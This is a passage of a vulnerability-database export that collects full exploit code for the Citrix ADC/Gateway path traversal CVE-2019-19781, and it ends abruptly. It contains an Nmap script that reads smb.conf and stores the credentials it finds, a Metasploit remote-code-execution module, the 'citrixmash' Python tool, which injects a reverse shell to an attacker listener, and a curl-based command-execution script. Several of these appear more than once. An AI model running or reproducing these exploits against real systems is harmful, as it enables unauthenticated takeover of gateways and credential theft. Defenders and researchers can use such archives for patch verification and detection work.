\n-- </table> \n \nauthor = \"Dhiraj Mishra (@RandomDhiraj)\" \nDiscovery = \"Mikhail Klyuchnikov (@__Mn1__)\" \nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\" \ncategories = {\"discovery\", \"intrusive\",\"vuln\"} \n \nportrule = shortport.ssl \n \naction = function(host,port) \nlocal outputFile = stdnse.get_script_args(SCRIPT_NAME..\".output\") or nil \nlocal vuln = { \ntitle = 'Citrix ADC Path Traversal', \nstate = vulns.STATE.NOT_VULN, \ndescription = [[ \nCitrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, \n12.1, and 13.0 are vulnerable \nto a unauthenticated path traversal vulnerability that allows attackers to \nread configurations or any other file. \n]], \nreferences = { \n'https://support.citrix.com/article/CTX267027', \n'https://nvd.nist.gov/vuln/detail/CVE-2019-19781', \n}, \ndates = { \ndisclosure = {year = '2019', month = '12', day = '17'}, \n}, \n} \nlocal vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) \nlocal path = \"/vpn/../vpns/cfg/smb.conf\" \nlocal response \nlocal output = {} \nlocal success = \"Host is vulnerable to CVE-2019-19781\" \nlocal fail = \"Host is not vulnerable\" \nlocal match = \"[global]\" \nlocal credentials \nlocal citrixADC \nresponse = http.get(host, port.number, path) \n \nif not response.status then \nstdnse.print_debug(\"Request Failed\") \nreturn \nend \nif response.status == 200 then \nif string.match(response.body, match) then \nstdnse.print_debug(\"%s: %s GET %s - 200 OK\", \nSCRIPT_NAME,host.targetname or host.ip, path) \nvuln.state = vulns.STATE.VULN \ncitrixADC = ((\"Path traversal: https://%s:%d%s\"):format(host.targetname \nor host.ip,port.number, path)) \nif outputFile then \ncredentials = response.body:gsub('%W','.') \nvuln.check_results = stdnse.format_output(true, citrixADC) \nvuln.extra_info = stdnse.format_output(true, \"Credentials are being \nstored in the output file\") \nfile = io.open(outputFile, \"a\") \nfile:write(credentials, \"\\n\") \nelse \nvuln.check_results = stdnse.format_output(true, citrixADC) \nend \nend \nelseif response.status == 403 then \nstdnse.print_debug(\"%s: %s GET %s - %d\", SCRIPT_NAME, host.targetname \nor host.ip, path, response.status) \nvuln.state = vulns.STATE.NOT_VULN \nend \n \nreturn vuln_report:make_output(vuln) \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/155972/cadcg-traversal.nse.txt"}, {"lastseen": "2020-01-13T22:40:41", "description": "", "published": "2020-01-13T00:00:00", "type": "packetstorm", "title": "Citrix Application Delivery Controller / Gateway 10.5 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19781"], "modified": "2020-01-13T00:00:00", "id": "PACKETSTORM:155930", "href": "https://packetstormsecurity.com/files/155930/Citrix-Application-Delivery-Controller-Gateway-10.5-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Citrix ADC Remote Code Execution', \n'Description' => %q( \nAn issue was discovered in Citrix Application Delivery Controller (ADC) \nand Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. \n), \n'Author' => [ \n'RAMELLA S\u00e9bastien' # https://www.pirates.re/ \n], \n'References' => [ \n['CVE', '2019-19781'], \n['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'], \n['EDB', '47901'], \n['EDB', '47902'] \n], \n'DisclosureDate' => '2019-12-17', \n'License' => MSF_LICENSE, \n'Platform' => ['unix'], \n'Arch' => ARCH_CMD, \n'Privileged' => true, \n'Payload' => { \n'Compat' => { \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl meterpreter' \n} \n}, \n'Targets' => [ \n['Unix (remote shell)', \n'Type' => :cmd_shell, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_perl', \n'DisablePayloadHandler' => 'false' \n} \n], \n['Unix (command-line)', \n'Type' => :cmd_generic, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/generic', \n'DisablePayloadHandler' => 'true' \n} \n], \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOptAddress.new('RHOST', [true, 'The target address']) \n]) \n \nregister_advanced_options([ \nOptBool.new('ForceExploit', [false, 'Override check result', false]) \n]) \n \nderegister_options('RHOSTS') \nend \n \ndef execute_command(command, opts = {}) \nfilename = Rex::Text.rand_text_alpha(16) \nnonce = Rex::Text.rand_text_alpha(6) \n \nrequest = { \n'method' => 'POST', \n'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'), \n'headers' => { \n'NSC_USER' => '../../../netscaler/portal/templates/' + filename, \n'NSC_NONCE' => nonce \n}, \n'vars_post' => { \n'url' => 'http://127.0.0.1', \n'title' => \"[% template.new({'BLOCK'='print readpipe(#{get_chr_payload(command)})'})%]\", \n'desc' => 'desc', \n'UI_inuse' => 'RfWeb' \n}, \n'encode_params' => false \n} \n \nbegin \nreceived = send_request_cgi(request) \nrescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN \nprint_error('Unable to connect on the remote target.') \nend \nreturn false unless received \n \nif received.code == 200 \nvprint_status(\"#{received.get_html_document.text}\") \nsleep 2 \n \nrequest = { \n'method' => 'GET', \n'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'), \n'headers' => { \n'NSC_USER' => nonce, \n'NSC_NONCE' => nonce \n} \n} \n \n## Trigger to gain exploitation. \nbegin \nsend_request_cgi(request) \nreceived = send_request_cgi(request) \nrescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN \nprint_error('Unable to connect on the remote target.') \nend \nreturn false unless received \nreturn received \nend \n \nreturn false \nend \n \ndef get_chr_payload(command) \nchr_payload = command \ni = chr_payload.length \n \noutput = \"\" \nchr_payload.each_char do | c | \ni = i - 1 \noutput << \"chr(\" << c.ord.to_s << \")\" \nif i != 0 \noutput << \" . \" \nend \nend \n \nreturn output \nend \n \ndef check \nbegin \nreceived = send_request_cgi( \n\"method\" => \"GET\", \n\"uri\" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf') \n) \nrescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN \nprint_error('Unable to connect on the remote target.') \nend \n \nif received && received.code != 200 \nreturn Exploit::CheckCode::Safe \nend \nreturn Exploit::CheckCode::Vulnerable \nend \n \ndef exploit \nunless check.eql? Exploit::CheckCode::Vulnerable \nunless datastore['ForceExploit'] \nfail_with(Failure::NotVulnerable, 'The target is not exploitable.') \nend \nelse \nprint_good('The target appears to be vulnerable.') \nend \n \ncase target['Type'] \nwhen :cmd_generic \nprint_status(\"Sending #{datastore['PAYLOAD']} command payload\") \nvprint_status(\"Generated command payload: #{payload.encoded}\") \n \nreceived = execute_command(payload.encoded) \nif (received) && (datastore['PAYLOAD'] == \"cmd/unix/generic\") \nprint_warning('Dumping command output in parsed http response') \nprint_good(\"#{received.get_html_document.text}\") \nelse \nprint_warning('Empty response, no command output') \nreturn \nend \n \nwhen :cmd_shell \nprint_status(\"Sending #{datastore['PAYLOAD']} command payload\") \nvprint_status(\"Generated command payload: #{payload.encoded}\") \n \nexecute_command(payload.encoded) \nend \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/155930/citrix-exec.rb.txt"}, {"lastseen": "2020-01-13T22:40:41", "description": "", "published": "2020-01-11T00:00:00", "type": "packetstorm", "title": "Citrix Application Delivery Controller / Gateway Remote Code Execution / Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T00:00:00", "id": "PACKETSTORM:155905", "href": "https://packetstormsecurity.com/files/155905/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution-Traversal.html", "sourceData": "`#!/usr/bin/python3 \n# \n# Exploits the Citrix Directory Traversal Bug: CVE-2019-19781 \n# \n# You only need a listener like netcat to catch the shell. \n# \n# Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White \n# \n# Tool Written by: Rob Simon and David Kennedy \n \nimport requests \nimport urllib3 \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings \nimport random \nimport string \nimport time \nfrom random import randint \nimport argparse \nimport sys \n \n# random string generator \ndef randomString(stringLength=10): \nletters = string.ascii_lowercase \nreturn ''.join(random.choice(letters) for i in range(stringLength)) \n \n# our random string for filename - will leave artifacts on system \nfilename = randomString() \nrandomuser = randomString() \n \n# generate random number for the nonce \nnonce = randint(5, 15) \n \n# this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script \n# note that the file location will be in /netscaler/portal/templates/filename.xml \ndef stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport): \n \n# encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC) \nencoded = \"\" \ni=0 \ntext = (\"\"\"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\"\"\" % (attackerip, attackerport)) \nwhile i < len(text): \nencoded = encoded + \"chr(\"+str(ord(text[i]))+\") . \" \ni += 1 \nencoded = encoded[:-3] \npayload=\"[% template.new({'BLOCK'='print readpipe(\" + encoded + \")'})%]\" \nheaders = ( \n{ \n'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0', \n'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename), \n'NSC_NONCE' : '%s' % (nonce), \n}) \n \ndata = ( \n{ \n\"url\" : \"127.0.0.1\", \n\"title\" : payload, \n\"desc\" : \"desc\", \n\"UI_inuse\" : \"a\" \n}) \n \nurl = (\"https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl\" % (victimip, victimport)) \nrequests.post(url, data=data, headers=headers, verify=False) \n \n# this is our second stage that triggers the exploit for us \ndef stage2(filename, randomuser, nonce, victimip, victimport): \nheaders = ( \n{ \n'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0', \n'NSC_USER' : '%s' % (randomuser), \n'NSC_NONCE' : '%s' % (nonce), \n}) \n \nrequests.get(\"https://%s:%s/vpn/../vpns/portal/%s.xml\" % (victimip, victimport, filename), headers=headers, verify=False) \n \n \n# start our main code to execute \nprint(''' \n \n.o oOOOOOOOo OOOo \nOb.OOOOOOOo OOOo. oOOo. .adOOOOOOO \nOboO\"\"\"\"\"\"\"\"\"\"\"\".OOo. .oOOOOOo. OOOo.oOOOOOo..\"\"\"\"\"\"\"\"\"'OO \nOOP.oOOOOOOOOOOO \"POOOOOOOOOOOo. `\"OOOOOOOOOP,OOOOOOOOOOOB' \n`O'OOOO' `OOOOo\"OOOOOOOOOOO` .adOOOOOOOOO\"oOOO' `OOOOo \n.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO \nOOOOO '\"OOOOOOOOOOOOOOOO\"` oOO \noOOOOOba. .adOOOOOOOOOOba .adOOOOo. \noOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO \nOOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO\"` '\"OOOOOOOOOOOOO.OOOOOOOOOOOOOO \n\"OOOO\" \"YOoOOOOMOIONODOO\"` . '\"OOROAOPOEOOOoOY\" \"OOO\" \nY 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :` \n: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? . \n. oOOP\"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO\"OOo \n'%o OOOO\"%OOOO%\"%OOOOO\"OOOOOO\"OOO': \n`$\" `OOOO' `O\"Y ' `OOOO' o . \n. . OP\" : o . \n: \n \nCitrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781 \nTool Written by: Rob Simon and Dave Kennedy \nContributions: The TrustedSec Team \nWebsite: https://www.trustedsec.com \nINFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/ \n \nThis tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used \nto append files in an XML format to the victim machine. This in turn allows for remote code execution. \n \nBe sure to cleanup these two file locations: \n/var/tmp/netscaler/portal/templates/ \n/netscaler/portal/templates/ \n \nUsage: \n \npython citrixmash.py <victimipaddress> <victimport> <attacker_listener> <attacker_port>\\n''') \n \n# parse our commands \nparser = argparse.ArgumentParser() \nparser.add_argument(\"target\", help=\"the vulnerable server with Citrix (defaults https)\") \nparser.add_argument(\"targetport\", help=\"the target server web port (normally on 443)\") \nparser.add_argument(\"attackerip\", help=\"the attackers reverse listener IP address\") \nparser.add_argument(\"attackerport\", help=\"the attackersa reverse listener port\") \nargs = parser.parse_args() \nprint(\"[*] Firing STAGE1 POST request to create the XML template exploit to disk...\") \nprint(\"[*] Saving filename as %s.xml on the victim machine...\" % (filename)) \n# trigger our first post \nstage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport) \nprint(\"[*] Sleeping for 2 seconds to ensure file is written before we call it...\") \ntime.sleep(2) \nprint(\"[*] Triggering GET request for the newly created file with a listener waiting...\") \nprint(\"[*] Shell should now be in your listener... enjoy. Keep this window open..\") \nprint(\"[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/\") \n# trigger our second post \nstage2(filename, randomuser, nonce, args.target, args.targetport) \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/155905/citrix-traversalexec.txt"}, {"lastseen": "2020-01-13T22:40:41", "description": "", "published": "2020-01-11T00:00:00", "type": "packetstorm", "title": "Citrix Application Delivery Controller / Gateway Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T00:00:00", "id": "PACKETSTORM:155904", "href": "https://packetstormsecurity.com/files/155904/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution.html", "sourceData": "`#!/bin/bash \n# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781 \n# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a' \n# Release Date : 11/01/2020 \n# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia \necho \"================================================================================= \n___ _ _ ____ ___ _ _ \n| _ \\ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _ \n| _/| '_|/ _ \\ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \\ | | | ' \\ / _' || |/ _' | \n|_| |_| \\___/_/ |\\___|\\__| \\__| /___|\\___||_| \\___/ |___||_||_|\\__,_||_|\\__,_| \n|__/ CVE-2019-19781 \n=================================================================================\" \n############################## \nif [ -z \"$1\" ]; \nthen \necho -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\\n' \nexit; \nfi \nfilenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1); \ncurl -s -k \"https://$1/vpn/../vpns/portal/scripts/newbm.pl\" -d \"url=http://example.com\\&title=[%25+template.new({'BLOCK'%3d'exec(\\'$2 | tee /netscaler/portal/templates/$filenameid.xml\\')%3b'})+%25]\\&desc=test\\&UI_inuse=RfWeb\" -H \"NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid\" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is \necho -ne \"\\n\" ;curl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -s -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is \necho -ne \"Command Output :\\n\" \ncurl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/155904/citrixadcg-exec.txt"}], "exploitpack": [{"lastseen": "2020-04-01T20:39:50", "description": "\nCitrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal", "edition": 1, "published": "2020-01-16T00:00:00", "title": "Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19781"], "modified": "2020-01-16T00:00:00", "id": "EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "href": "", "sourceData": "# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal\n# Date: 2019-12-17\n# CVE: CVE-2019-19781\n# Vulenrability: Path Traversal\n# Vulnerablity Discovery: Mikhail Klyuchnikov\n# Exploit Author: Dhiraj Mishra\n# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0\n# Vendor Homepage: https://www.citrix.com/\n# References: https://support.citrix.com/article/CTX267027\n# https://github.com/nmap/nmap/pull/1893\n\nlocal http = require \"http\"\nlocal stdnse = require \"stdnse\"\nlocal shortport = require \"shortport\"\nlocal table = require \"table\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\nlocal nmap = require \"nmap\"\nlocal io = require \"io\"\n\ndescription = [[\nThis NSE script checks whether the traget server is vulnerable to\nCVE-2019-19781\n]]\n---\n-- @usage\n-- nmap --script https-citrix-path-traversal -p <port> <host>\n-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args\noutput='file.txt'\n-- @output\n-- PORT STATE SERVICE\n-- 443/tcp open http\n-- | CVE-2019-19781:\n-- | Host is vulnerable to CVE-2019-19781\n-- @changelog\n-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)\n-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)\n-- @xmloutput\n-- <table key=\"NMAP-1\">\n-- <elem key=\"title\">Citrix ADC Path Traversal aka (Shitrix)</elem>\n-- <elem key=\"state\">VULNERABLE</elem>\n-- <table key=\"description\">\n-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5,\n11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path\n-- traversal vulnerability that allows attackers to read configurations or\nany other file.\n-- </table>\n-- <table key=\"dates\">\n-- <table key=\"disclosure\">\n-- <elem key=\"year\">2019</elem>\n-- <elem key=\"day\">17</elem>\n-- <elem key=\"month\">12</elem>\n-- </table>\n-- </table>\n-- <elem key=\"disclosure\">17-12-2019</elem>\n-- <table key=\"extra_info\">\n-- </table>\n-- <table key=\"refs\">\n-- <elem>https://support.citrix.com/article/CTX267027</elem>\n-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>\n-- </table>\n-- </table>\n\nauthor = \"Dhiraj Mishra (@RandomDhiraj)\"\nDiscovery = \"Mikhail Klyuchnikov (@__Mn1__)\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"intrusive\",\"vuln\"}\n\nportrule = shortport.ssl\n\naction = function(host,port)\n local outputFile = stdnse.get_script_args(SCRIPT_NAME..\".output\") or nil\n local vuln = {\n title = 'Citrix ADC Path Traversal',\n state = vulns.STATE.NOT_VULN,\n description = [[\nCitrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,\n12.1, and 13.0 are vulnerable\nto a unauthenticated path traversal vulnerability that allows attackers to\nread configurations or any other file.\n ]],\n references = {\n 'https://support.citrix.com/article/CTX267027',\n 'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',\n },\n dates = {\n disclosure = {year = '2019', month = '12', day = '17'},\n },\n }\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\n local path = \"/vpn/../vpns/cfg/smb.conf\"\n local response\n local output = {}\n local success = \"Host is vulnerable to CVE-2019-19781\"\n local fail = \"Host is not vulnerable\"\n local match = \"[global]\"\n local credentials\n local citrixADC\n response = http.get(host, port.number, path)\n\n if not response.status then\n stdnse.print_debug(\"Request Failed\")\n return\n end\n if response.status == 200 then\n if string.match(response.body, match) then\n stdnse.print_debug(\"%s: %s GET %s - 200 OK\",\nSCRIPT_NAME,host.targetname or host.ip, path)\n vuln.state = vulns.STATE.VULN\n citrixADC = ((\"Path traversal: https://%s:%d%s\"):format(host.targetname\nor host.ip,port.number, path))\n if outputFile then\n credentials = response.body:gsub('%W','.')\nvuln.check_results = stdnse.format_output(true, citrixADC)\n vuln.extra_info = stdnse.format_output(true, \"Credentials are being\nstored in the output file\")\nfile = io.open(outputFile, \"a\")\nfile:write(credentials, \"\\n\")\n else\n vuln.check_results = stdnse.format_output(true, citrixADC)\n end\n end\n elseif response.status == 403 then\n stdnse.print_debug(\"%s: %s GET %s - %d\", SCRIPT_NAME, host.targetname\nor host.ip, path, response.status)\n vuln.state = vulns.STATE.NOT_VULN\n end\n\n return vuln_report:make_output(vuln)\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:39:50", "description": "\nCitrix Application Delivery Controller and Citrix Gateway - Remote Code Execution", "edition": 1, "published": "2020-01-11T00:00:00", "title": "Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T00:00:00", "id": "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "href": "", "sourceData": "#!/usr/bin/python3\n#\n# Exploits the Citrix Directory Traversal Bug: CVE-2019-19781\n#\n# You only need a listener like netcat to catch the shell.\n#\n# Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White\n#\n# Tool Written by: Rob Simon and David Kennedy\n\nimport requests\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings\nimport random\nimport string\nimport time\nfrom random import randint\nimport argparse\nimport sys\n\n# random string generator\ndef randomString(stringLength=10):\n letters = string.ascii_lowercase\n return ''.join(random.choice(letters) for i in range(stringLength))\n\n# our random string for filename - will leave artifacts on system\nfilename = randomString()\nrandomuser = randomString()\n\n# generate random number for the nonce\nnonce = randint(5, 15) \n\n# this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script\n# note that the file location will be in /netscaler/portal/templates/filename.xml\ndef stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport):\n\n # encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC)\n encoded = \"\"\n i=0\n text = (\"\"\"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\"\"\" % (attackerip, attackerport))\n while i < len(text):\n encoded = encoded + \"chr(\"+str(ord(text[i]))+\") . \"\n i += 1\n encoded = encoded[:-3]\n payload=\"[% template.new({'BLOCK'='print readpipe(\" + encoded + \")'})%]\"\n headers = ( \n {\n 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',\n 'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename),\n 'NSC_NONCE' : '%s' % (nonce),\n })\n\n data = (\n {\n \"url\" : \"127.0.0.1\",\n \"title\" : payload,\n \"desc\" : \"desc\",\n \"UI_inuse\" : \"a\"\n })\n\n url = (\"https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl\" % (victimip, victimport))\n requests.post(url, data=data, headers=headers, verify=False)\n\n# this is our second stage that triggers the exploit for us\ndef stage2(filename, randomuser, nonce, victimip, victimport):\n headers = (\n {\n 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',\n 'NSC_USER' : '%s' % (randomuser),\n 'NSC_NONCE' : '%s' % (nonce),\n })\n\n requests.get(\"https://%s:%s/vpn/../vpns/portal/%s.xml\" % (victimip, victimport, filename), headers=headers, verify=False)\n\n\n# start our main code to execute\nprint('''\n\n .o oOOOOOOOo OOOo\n Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO\n OboO\"\"\"\"\"\"\"\"\"\"\"\".OOo. .oOOOOOo. OOOo.oOOOOOo..\"\"\"\"\"\"\"\"\"'OO\n OOP.oOOOOOOOOOOO \"POOOOOOOOOOOo. `\"OOOOOOOOOP,OOOOOOOOOOOB'\n `O'OOOO' `OOOOo\"OOOOOOOOOOO` .adOOOOOOOOO\"oOOO' `OOOOo\n .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO\n OOOOO '\"OOOOOOOOOOOOOOOO\"` oOO\n oOOOOOba. .adOOOOOOOOOOba .adOOOOo.\n oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO\n OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO\"` '\"OOOOOOOOOOOOO.OOOOOOOOOOOOOO\n \"OOOO\" \"YOoOOOOMOIONODOO\"` . '\"OOROAOPOEOOOoOY\" \"OOO\"\n Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`\n : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .\n . oOOP\"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO\"OOo\n '%o OOOO\"%OOOO%\"%OOOOO\"OOOOOO\"OOO':\n `$\" `OOOO' `O\"Y ' `OOOO' o .\n . . OP\" : o .\n :\n\nCitrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781\nTool Written by: Rob Simon and Dave Kennedy\nContributions: The TrustedSec Team \nWebsite: https://www.trustedsec.com\nINFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/\n\nThis tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used\nto append files in an XML format to the victim machine. This in turn allows for remote code execution.\n\nBe sure to cleanup these two file locations:\n /var/tmp/netscaler/portal/templates/\n /netscaler/portal/templates/\n\nUsage:\n\npython citrixmash.py <victimipaddress> <victimport> <attacker_listener> <attacker_port>\\n''')\n\n# parse our commands\nparser = argparse.ArgumentParser()\nparser.add_argument(\"target\", help=\"the vulnerable server with Citrix (defaults https)\")\nparser.add_argument(\"targetport\", help=\"the target server web port (normally on 443)\")\nparser.add_argument(\"attackerip\", help=\"the attackers reverse listener IP address\")\nparser.add_argument(\"attackerport\", help=\"the attackersa reverse listener port\")\nargs = parser.parse_args()\nprint(\"[*] Firing STAGE1 POST request to create the XML template exploit to disk...\")\nprint(\"[*] Saving filename as %s.xml on the victim machine...\" % (filename))\n# trigger our first post\nstage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport)\nprint(\"[*] Sleeping for 2 seconds to ensure file is written before we call it...\")\ntime.sleep(2)\nprint(\"[*] Triggering GET request for the newly created file with a listener waiting...\")\nprint(\"[*] Shell should now be in your listener... enjoy. Keep this window open..\")\nprint(\"[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/\")\n# trigger our second post\nstage2(filename, randomuser, nonce, args.target, args.targetport)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:39:50", "description": "\nCitrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)", "edition": 1, "published": "2020-01-11T00:00:00", "title": "Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T00:00:00", "id": "EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "href": "", "sourceData": "#!/bin/bash\n# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781\n# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'\n# Release Date : 11/01/2020\n# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia\necho \"=================================================================================\n ___ _ _ ____ ___ _ _\n| _ \\ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _\n| _/| '_|/ _ \\ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \\ | | | ' \\ / _' || |/ _' |\n|_| |_| 